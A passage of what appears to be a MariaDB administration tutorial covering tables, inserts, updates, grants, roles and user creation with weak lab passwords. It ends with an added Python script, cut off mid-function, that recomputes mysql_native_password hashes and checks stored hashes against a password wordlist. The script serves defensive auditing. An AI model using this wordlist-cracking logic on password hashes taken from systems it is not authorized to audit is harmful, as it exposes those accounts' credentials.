<span style="color: white;">+--------------------------+</span>
</pre></div>
</div><div><br /></div><div><div><br /></div><div>Verifying the table structure:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> DESCRIBE interesting_data;</span>
<span style="color: white;">+----------+--------------+------+-----+---------+----------------+</span>
<span style="color: white;">| Field | Type | Null | Key | Default | Extra |</span>
<span style="color: white;">+----------+--------------+------+-----+---------+----------------+</span>
<span style="color: white;">| file_no | int(11) | NO | PRI | NULL | auto_increment |</span>
<span style="color: white;">| owner | varchar(100) | YES | | NULL | |</span>
<span style="color: white;">| password | varchar(100) | YES | | NULL | |</span>
<span style="color: white;">+----------+--------------+------+-----+---------+----------------+</span>
</pre></div>
</div><div><br /></div><div>Alternatively </div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW FULL COLUMNS FROM interesting_data</span>
<span style="color: white;"> -> ;</span>
<span style="color: white;">+----------+--------------+--------------------+------+-----+---------+----------------+---------------------------------+---------+</span>
<span style="color: white;">| Field | Type | Collation | Null | Key | Default | Extra | Privileges | Comment |</span>
<span style="color: white;">+----------+--------------+--------------------+------+-----+---------+----------------+---------------------------------+---------+</span>
<span style="color: white;">| file_no | int(11) | NULL | NO | PRI | NULL | auto_increment | select,insert,update,references | |</span>
<span style="color: white;">| owner | varchar(100) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">| password | varchar(100) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">+----------+--------------+--------------------+------+-----+---------+----------------+---------------------------------+---------+</span>
<span style="color: white;">3 rows in set (0.001 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Yet another way of verifying the table creation.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW FULL COLUMNS FROM interesting_data \G;</span>
<span style="color: white;">*************************** 1. row ***************************</span>
<span style="color: white;"> Field: file_no</span>
<span style="color: white;"> Type: int(11)</span>
<span style="color: white;"> Collation: NULL</span>
<span style="color: white;"> Null: NO</span>
<span style="color: white;"> Key: PRI</span>
<span style="color: white;"> Default: NULL</span>
<span style="color: white;"> Extra: auto_increment</span>
<span style="color: white;">Privileges: select,insert,update,references</span>
<span style="color: white;"> Comment: </span>
<span style="color: white;">*************************** 2. row ***************************</span>
<span style="color: white;"> Field: owner</span>
<span style="color: white;"> Type: varchar(100)</span>
<span style="color: white;"> Collation: utf8mb4_general_ci</span>
<span style="color: white;"> Null: YES</span>
<span style="color: white;"> Key: </span>
<span style="color: white;"> Default: NULL</span>
<span style="color: white;"> Extra: </span>
<span style="color: white;">Privileges: select,insert,update,references</span>
<span style="color: white;"> Comment: </span>
<span style="color: white;">*************************** 3. row ***************************</span>
<span style="color: white;"> Field: password</span>
<span style="color: white;"> Type: varchar(100)</span>
<span style="color: white;"> Collation: utf8mb4_general_ci</span>
<span style="color: white;"> Null: YES</span>
<span style="color: white;"> Key: </span>
<span style="color: white;"> Default: NULL</span>
<span style="color: white;"> Extra: </span>
<span style="color: white;">Privileges: select,insert,update,references</span>
<span style="color: white;"> Comment: </span>
<span style="color: white;">3 rows in set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With the table created, let's alter that table before adding some data</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> ALTER TABLE interesting_data ADD admin VARCHAR(2) NOT NULL DEFAULT 'Y';</span>
<span style="color: white;">Query OK, 0 rows affected (0.017 sec)</span>
<span style="color: white;">Records: 0 Duplicates: 0 Warnings: 0</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Add multiple columns that we will ultimately delete.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> ALTER TABLE interesting_data ADD comments VARCHAR(255), ADD blogs VARCHAR(255), ADD delete_me VARCHAR(255);</span>
<span style="color: white;">Query OK, 0 rows affected (0.026 sec)</span>
<span style="color: white;">Records: 0 Duplicates: 0 Warnings: 0</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Show the table structure</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW FULL COLUMNS FROM interesting_data;</span>
<span style="color: white;">+-----------+--------------+--------------------+------+-----+---------+----------------+---------------------------------+---------+</span>
<span style="color: white;">| Field | Type | Collation | Null | Key | Default | Extra | Privileges | Comment |</span>
<span style="color: white;">+-----------+--------------+--------------------+------+-----+---------+----------------+---------------------------------+---------+</span>
<span style="color: white;">| file_no | int(11) | NULL | NO | PRI | NULL | auto_increment | select,insert,update,references | |</span>
<span style="color: white;">| owner | varchar(100) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">| password | varchar(100) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">| admin | varchar(2) | utf8mb4_general_ci | NO | | Y | | select,insert,update,references | |</span>
<span style="color: white;">| comments | varchar(255) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">| blogs | varchar(255) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">| delete_me | varchar(255) | utf8mb4_general_ci | YES | | NULL | | select,insert,update,references | |</span>
<span style="color: white;">+-----------+--------------+--------------------+------+-----+---------+----------------+---------------------------------+---------+</span>
<span style="color: white;">7 rows in set (0.001 sec)</span>
</pre></div>
</div><div><br /></div><div>With the table created with its various columns, let's add some data.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> INSERT INTO interesting_data(owner,password,admin,comments,blogs,delete_me) VALUES('securitynik','Testing1','Y','Systems Administrator','https://www.securitynik.com','you are to be deleted');</span>
<span style="color: white;">Query OK, 1 row affected (0.010 sec)</span>
</pre></div><br /></div><div><div>Note that you do not have to list every column, only the ones you want to populate. Columns you leave out receive their default value, or <i>NULL</i> if they allow it (<i>delete_me</i> below). A column declared <i>NOT NULL</i> with no default must always be supplied, the exception being an <i>auto_increment</i> key such as <i>file_no</i>, which the server fills in.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> INSERT INTO interesting_data(owner,password,admin,comments,blogs) VALUES('booo','Testing1','Y','Guest User','https://www.example.local');</span>
<span style="color: white;">Query OK, 1 row affected (0.009 sec)</span>
</pre></div>
</div><div><br /></div><div>Insert multiple records in a single statement by separating the row tuples with commas. Also note the <i>DEFAULT</i> keyword in the <i>admin</i> position, which stores that column's default value ('Y').</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> INSERT INTO interesting_data(owner,password,admin,comments,blogs) VALUES('YouKnowWhoIAm','andYouKnowMyPassword',DEFAULT,'some user','https://www.blah.local'), ('hello','world',DEFAULT,'hi','securitynik.local');</span>
<span style="color: white;">Query OK, 2 rows affected (0.012 sec)</span>
<span style="color: white;">Records: 2 Duplicates: 0 Warnings: 0</span>
</pre></div>
</div><div><br /></div><div>With some records added, let's see what <i>SELECT *</i> returns. The rows inserted without <i>delete_me</i> show <i>NULL</i> in that column, and the two rows inserted with <i>DEFAULT</i> have <i>admin</i> set to Y.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT * FROM interesting_data;</span>
<span style="color: white;">+---------+---------------+----------------------+-------+-----------------------+-----------------------------+-----------------------+</span>
<span style="color: white;">| file_no | owner | password | admin | comments | blogs | delete_me |</span>
<span style="color: white;">+---------+---------------+----------------------+-------+-----------------------+-----------------------------+-----------------------+</span>
<span style="color: white;">| 1 | securitynik | Testing1 | Y | Systems Administrator | https://www.securitynik.com | you are to be deleted |</span>
<span style="color: white;">| 2 | booo | Testing1 | Y | Guest User | https://www.example.local | NULL |</span>
<span style="color: white;">| 3 | YouKnowWhoIAm | andYouKnowMyPassword | Y | some user | https://www.blah.local | NULL |</span>
<span style="color: white;">| 4 | hello | world | Y | hi | securitynik.local | NULL |</span>
<span style="color: white;">+---------+---------------+----------------------+-------+-----------------------+-----------------------------+-----------------------+</span>
<span style="color: white;">4 rows in set (0.000 sec)</span>
</pre></div>
</div><div><br /></div><div>Rather than every column, select just <i>owner</i>, <i>password</i> and <i>blogs</i> from the table:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT owner,password,blogs FROM interesting_data;</span>
<span style="color: white;">+---------------+----------------------+-----------------------------+</span>
<span style="color: white;">| owner | password | blogs |</span>
<span style="color: white;">+---------------+----------------------+-----------------------------+</span>
<span style="color: white;">| securitynik | Testing1 | https://www.securitynik.com |</span>
<span style="color: white;">| booo | Testing1 | https://www.example.local |</span>
<span style="color: white;">| YouKnowWhoIAm | andYouKnowMyPassword | https://www.blah.local |</span>
<span style="color: white;">| hello | world | securitynik.local |</span>
<span style="color: white;">+---------------+----------------------+-----------------------------+</span>
<span style="color: white;">4 rows in set (0.000 sec)</span>
</pre></div>
</div><div><br /></div><div>One more <i>SELECT</i>, this time with a <i>WHERE</i> clause. Because <i>file_no</i> is an integer column, the value after the equal sign is an unquoted number.</div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT owner,password,blogs FROM interesting_data WHERE file_no=3;</span>
<span style="color: white;">+---------------+----------------------+------------------------+</span>
<span style="color: white;">| owner | password | blogs |</span>
<span style="color: white;">+---------------+----------------------+------------------------+</span>
<span style="color: white;">| YouKnowWhoIAm | andYouKnowMyPassword | https://www.blah.local |</span>
<span style="color: white;">+---------------+----------------------+------------------------+</span>
<span style="color: white;">1 row in set (0.000 sec)</span>
</pre></div>
<p></p><p>Alternatively, select every column of the row matched by a <i>WHERE</i> clause on a string column. Because <i>owner</i> is a varchar, the value after the equal sign is quoted.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT * FROM interesting_data WHERE owner='YouKnowWhoIAm';</span>
<span style="color: white;">+---------+---------------+----------------------+-------+-----------+------------------------+-----------+</span>
<span style="color: white;">| file_no | owner | password | admin | comments | blogs | delete_me |</span>
<span style="color: white;">+---------+---------------+----------------------+-------+-----------+------------------------+-----------+</span>
<span style="color: white;">| 3 | YouKnowWhoIAm | andYouKnowMyPassword | Y | some user | https://www.blah.local | NULL |</span>
<span style="color: white;">+---------+---------------+----------------------+-------+-----------+------------------------+-----------+</span>
<span style="color: white;">1 row in set (0.000 sec)</span>
</pre></div>
<p></p><p>Update a record. <i>LOW_PRIORITY</i> delays the write until no other client is reading the table (it only matters for engines with table-level locking, such as MyISAM) and <i>IGNORE</i> turns errors that would abort the statement into warnings; neither is needed here and the statement works without them. What is essential is the <i>WHERE</i> clause: without it, <i>UPDATE</i> rewrites every row in the table.<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> UPDATE LOW_PRIORITY IGNORE interesting_data SET owner='owner_updated_YouKnowWhoIAm', password='You changed me :-(' WHERE file_no=3;</span>
<span style="color: white;">Query OK, 1 row affected (0.009 sec)</span>
<span style="color: white;">Rows matched: 1 Changed: 1 Warnings: 0</span>
</pre></div>
<p></p><p>Verify the change</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT owner,password,blogs FROM interesting_data WHERE file_no=3;</span>
<span style="color: white;">+-----------------------------+--------------------+------------------------+</span>
<span style="color: white;">| owner | password | blogs |</span>
<span style="color: white;">+-----------------------------+--------------------+------------------------+</span>
<span style="color: white;">| owner_updated_YouKnowWhoIAm | You changed me :-( | https://www.blah.local |</span>
<span style="color: white;">+-----------------------------+--------------------+------------------------+</span>
<span style="color: white;">1 row in set (0.000 sec)</span>
</pre></div>
<p></p><p>Before sharing our database with other users, let's see what privileges the current account holds. <i>SHOW GRANTS</i> with no argument reports the grants of the account you are logged in as.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS;</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| Grants for root@localhost |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` IDENTIFIED VIA mysql_native_password USING 'invalid' OR unix_socket WITH GRANT OPTION |</span>
<span style="color: white;">| GRANT PROXY ON ''@'%' TO 'root'@'localhost' WITH GRANT OPTION |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">2 rows in set (0.000 sec)</span>
</pre></div>
<p></p><p>Two things stand out in that output. The root account holds <i>ALL PRIVILEGES ON *.*</i> <i>WITH GRANT OPTION</i>, and its <i>IDENTIFIED VIA</i> clause shows how it authenticates: the <i>mysql_native_password</i> hash is the literal string 'invalid', which no password can ever match, so root can only get in through the <i>unix_socket</i> plugin, i.e. by being the root OS user on the host. To see the grants for a particular account, name it:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS FOR root@localhost;</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| Grants for root@localhost |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` IDENTIFIED VIA mysql_native_password USING 'invalid' OR unix_socket WITH GRANT OPTION |</span>
<span style="color: white;">| GRANT PROXY ON ''@'%' TO 'root'@'localhost' WITH GRANT OPTION |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">2 rows in set (0.000 sec)</span>
</pre></div>
<p></p><p>Alternatively, <i>CURRENT_USER</i> refers to the account the session actually authenticated as (which can differ from the name the client supplied when a wildcard host entry matched):</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS FOR CURRENT_USER;</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| Grants for root@localhost |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` IDENTIFIED VIA mysql_native_password USING 'invalid' OR unix_socket WITH GRANT OPTION |</span>
<span style="color: white;">| GRANT PROXY ON ''@'%' TO 'root'@'localhost' WITH GRANT OPTION |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">2 rows in set (0.000 sec)</span>
</pre></div>
<p></p><p>Let's create and verify two roles.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> CREATE ROLE 'securitynik_db_admins';</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> CREATE ROLE 'securitynik_db_users';</span>
<span style="color: white;">Query OK, 0 rows affected (0.012 sec)</span>
</pre></div>
<p>Verify that both roles exist. A freshly created role carries only <i>USAGE</i>, which grants no privileges at all; it simply means the role is known to the server.</p>
<div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS FOR 'securitynik_db_admins';</span>
<span style="color: white;">+-----------------------------------------------+</span>
<span style="color: white;">| Grants for securitynik_db_admins |</span>
<span style="color: white;">+-----------------------------------------------+</span>
<span style="color: white;">| GRANT USAGE ON *.* TO `securitynik_db_admins` |</span>
<span style="color: white;">+-----------------------------------------------+</span>
<span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS FOR securitynik_db_users;</span>
<span style="color: white;">+----------------------------------------------+</span>
<span style="color: white;">| Grants for securitynik_db_users |</span>
<span style="color: white;">+----------------------------------------------+</span>
<span style="color: white;">| GRANT USAGE ON *.* TO `securitynik_db_users` |</span>
<span style="color: white;">+----------------------------------------------+</span>
</pre></div> <div>Grant all privileges on <i>securitynik_db</i>, and nothing outside it, to the <i>securitynik_db_admins</i> role. This grant does not include <i>WITH GRANT OPTION</i>, so members of the role cannot hand their privileges to other accounts.<p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> GRANT ALL ON securitynik_db.* TO 'securitynik_db_admins';</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span>
</pre></div>
<p></p><p>Grant <i>SELECT</i> only, again scoped to <i>securitynik_db.*</i>, to <i>securitynik_db_users</i>. This is the least-privilege role that ordinary users will receive.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> GRANT SELECT ON securitynik_db.* TO 'securitynik_db_users';</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span>
</pre></div>
<p></p><p>With the roles created and their access specified, time to add users.</p><p>Create an <i>admin</i> user whose password expires after 365 days. Note that 'admin' with no host part means 'admin'@'%', an account that may connect from any host; restrict the host (for example 'admin'@'localhost') unless remote access is genuinely required.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> CREATE USER IF NOT EXISTS 'admin' IDENTIFIED BY 'Testing1' PASSWORD EXPIRE INTERVAL 365 DAY;</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span>
</pre></div>
<p></p><p>Create a set of normal users in one statement. Two things to watch here. First, 'nakia'@'localhost' is the user <i>nakia</i> restricted to local connections, whereas 'neysa@localhost' is a single quoted string and therefore creates a user literally named <i>neysa@localhost</i> with host '%'; the <i>mysql.user</i> output further down shows the difference. Second, the <i>PASSWORD EXPIRE</i> and <i>ACCOUNT LOCK</i> options at the end apply to every account in the statement, not only the last one.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> CREATE USER 'securitynik' IDENTIFIED BY 'Testing1', 'nakia'@'localhost' IDENTIFIED BY 'Testing1', 'neysa@localhost' IDENTIFIED BY 'Testing1' PASSWORD EXPIRE INTERVAL 180 DAY ACCOUNT LOCK;</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span>
</pre></div>
<p></p><p>Review the structure of <i>mysql.user</i> (since MariaDB 10.4 a view over <i>mysql.global_priv</i>) to see which fields are available:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> DESCRIBE mysql.user;</span>
<span style="color: white;">+------------------------+---------------------+------+-----+----------+-------+</span>
<span style="color: white;">| Field | Type | Null | Key | Default | Extra |</span>
<span style="color: white;">+------------------------+---------------------+------+-----+----------+-------+</span>
<span style="color: white;">| Host | char(255) | NO | | | |</span>
<span style="color: white;">| User | char(128) | NO | | | |</span>
<span style="color: white;">| Password | longtext | YES | | NULL | |</span>
<span style="color: white;">| Select_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Insert_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Update_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Delete_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Create_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Drop_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Reload_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Shutdown_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Process_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| File_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Grant_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| References_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Index_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Alter_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">| Show_db_priv | varchar(1) | YES | | NULL | |</span>
<span style="color: white;">.... TRUNCATED FOR BREVITY ....</span>
</pre></div>
<p></p><p>Select a few of those fields for every account and role. Note that all four new accounts carry the same hash: <i>mysql_native_password</i> is an unsalted SHA1(SHA1(password)), so identical passwords always produce identical hashes, which makes shared or reused passwords obvious to anyone who can read this table and cheap to crack. Note also <i>neysa@localhost</i> listed as a user name with host '%', the result of quoting 'neysa@localhost' as a single string in the <i>CREATE USER</i> statement. The roles have an empty host and <i>is_role</i> = Y.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT user,host,password,default_role,max_connections,max_user_connections,is_role FROM mysql.user; </span>
<span style="color: white;">+-----------------------+-----------+-------------------------------------------+--------------+-----------------+----------------------+---------+</span>
<span style="color: white;">| User | Host | Password | default_role | max_connections | max_user_connections | is_role |</span>
<span style="color: white;">+-----------------------+-----------+-------------------------------------------+--------------+-----------------+----------------------+---------+</span>
<span style="color: white;">| mariadb.sys | localhost | | | 0 | 0 | N |</span>
<span style="color: white;">| root | localhost | invalid | | 0 | 0 | N |</span>
<span style="color: white;">| mysql | localhost | invalid | | 0 | 0 | N |</span>
<span style="color: white;">| securitynik_db_users | | | | 0 | 0 | Y |</span>
<span style="color: white;">| securitynik_db_admins | | | | 0 | 0 | Y |</span>
<span style="color: white;">| admin | % | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 | | 0 | 0 | N |</span>
<span style="color: white;">| securitynik | % | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 | | 0 | 0 | N |</span>
<span style="color: white;">| nakia | localhost | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 | | 0 | 0 | N |</span>
<span style="color: white;">| neysa@localhost | % | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 | | 0 | 0 | N |</span>
<span style="color: white;">+-----------------------+-----------+-------------------------------------------+--------------+-----------------+----------------------+---------+</span>
<span style="color: white;">9 rows in set (0.001 sec)</span>
</pre></div>
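<p>As an added example, not part of the original post, here is a small audit in Python over the rows returned by the query above. The account rows are constructed inline to mirror that output; the candidate wordlist and the host and naming checks are my own assumptions about what is worth flagging. It recomputes the <i>mysql_native_password</i> hash, groups accounts that share a hash, and tests every stored hash against the candidate passwords.</p>

```python
import hashlib
from collections import defaultdict


def mysql_native_password(password: str) -> str:
    """mysql_native_password hash: '*' + upper-case hex of SHA1(SHA1(password)).
    There is no salt, so equal passwords always give equal hashes."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# Constructed sample: the rows shown by
# SELECT user,host,password,...,is_role FROM mysql.user above (roles included).
SAMPLE_ACCOUNTS = [
    {"user": "mariadb.sys", "host": "localhost", "password": "", "is_role": "N"},
    {"user": "root", "host": "localhost", "password": "invalid", "is_role": "N"},
    {"user": "mysql", "host": "localhost", "password": "invalid", "is_role": "N"},
    {"user": "securitynik_db_users", "host": "", "password": "", "is_role": "Y"},
    {"user": "securitynik_db_admins", "host": "", "password": "", "is_role": "Y"},
    {"user": "admin", "host": "%", "password": "*A7300B6D1322C0CFCE601E16B138D8139A4E07B7", "is_role": "N"},
    {"user": "securitynik", "host": "%", "password": "*A7300B6D1322C0CFCE601E16B138D8139A4E07B7", "is_role": "N"},
    {"user": "nakia", "host": "localhost", "password": "*A7300B6D1322C0CFCE601E16B138D8139A4E07B7", "is_role": "N"},
    {"user": "neysa@localhost", "host": "%", "password": "*A7300B6D1322C0CFCE601E16B138D8139A4E07B7", "is_role": "N"},
]

# Constructed candidate list (assumption: a short list of passwords common in labs).
WORDLIST = ["password", "Testing1", "changeme", "admin"]


def audit_accounts(accounts, wordlist):
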